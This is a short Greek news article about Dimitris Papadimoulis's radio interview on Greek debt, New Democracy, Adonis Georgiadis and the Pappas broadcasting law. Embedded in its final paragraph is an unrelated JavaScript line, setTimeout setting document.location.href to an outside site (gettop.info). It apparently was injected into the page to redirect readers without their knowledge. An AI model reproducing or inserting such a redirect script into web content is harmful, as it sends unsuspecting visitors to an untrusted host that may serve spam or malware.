Παπαδημούλης: Έχουν πάθει βέρτιγκο που δεν μπορούν να ρίξουν την κυβέρνηση

0
7

 

Εθνική γραμμή για τα σοβαρά θέματα, όπως το μεταναστευτικό και το χρέος, ζήτησε μιλώντας μιλώντας στον ραδιοφωνικό σταθμό του ΑΠΕ-ΜΠΕ «Πρακτορείο 104,9 Fm», ο Δημήτρης Παπαδημούλης.

Ο αντιπρόεδρος του Ευρωπαϊκού Κοινοβουλίου, αναφέρθηκε στο θέμα του χρέους λέγοντας πως η χώρα έχει αποκτήσει πολλούς συμμάχους και υπογράμμισε την επίσκεψη Ομπάμα στην Ελλάδα για τη διευθέτηση του χρέους.

«Έχουν πάθει βέρτιγκο, που δεν μπορούν να ρίξουν την κυβέρνηση» είπε χαρακτηριστικά και επανέλαβε την ανάγκη να μπει το δημόσιο συμφέρον πάνω από το κομματικό.

Ερωτηθείς για τις δηλώσεις του Άδωνι Γεωργιάδη, ο οποίος κατηγόρησε ως αντιδημοκράτες τα στελέχη της Αριστεράς, είπε: «Όταν με κατηγορεί ο κ. Γεωργιάδης θεωρώ ότι καλό έχω κάνει». Ο κ. Παπαδημούλης πάντως σημείωσε ότι η σημερινή ΝΔ, δεν έχει καμία σχέση με τις αρχές του ιδρυτή του κόμματος Κωνσταντίνου Καραμανλή και τόνισε ότι ο Κ. Μητσοτάκης έχει ευθύνη που αναβάθμισε στελέχη, τα οποία ο πρώην πρωθυπουργός Κώστας Καραμανλής, τα είχε χαρακτηρίσει άκρα.

Για το θέμα του νόμου Παππά και την απόφαση του ΣτΕ, ο κ. Παπαδημούλης είπε στο «Πρακτορείο 104,9 Fm», ότι η όποια απόφαση θα γίνει σεβαστή, αλλά σε κάθε περίπτωση κάλεσε τη ΝΔ να σταματήσει να σαμποτάρει τη διαδικασία και να προσέλθει στη συζήτηση για τη συγκρότηση του ΕΣΡ, ώστε να μπει φρένο στην ανομία και στην αδιαφάνεια.

Ο αντιπρόεδρος του Ευρωπαϊκού Κονοβουλίου, ερωτηθείς για τις επόμενες κινήσεις στην περίπτωση που κριθεί ο νόμος αντισυνταγματικός, είπε ότι στο πλαίσιο της απόφασης του ΣτΕ , θα πρέπει να διαμορφωθεί μία ρύθμιση που θα βάζει κανόνες και θα ρυθμίζει το τηλεοπτικό τοπίο. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here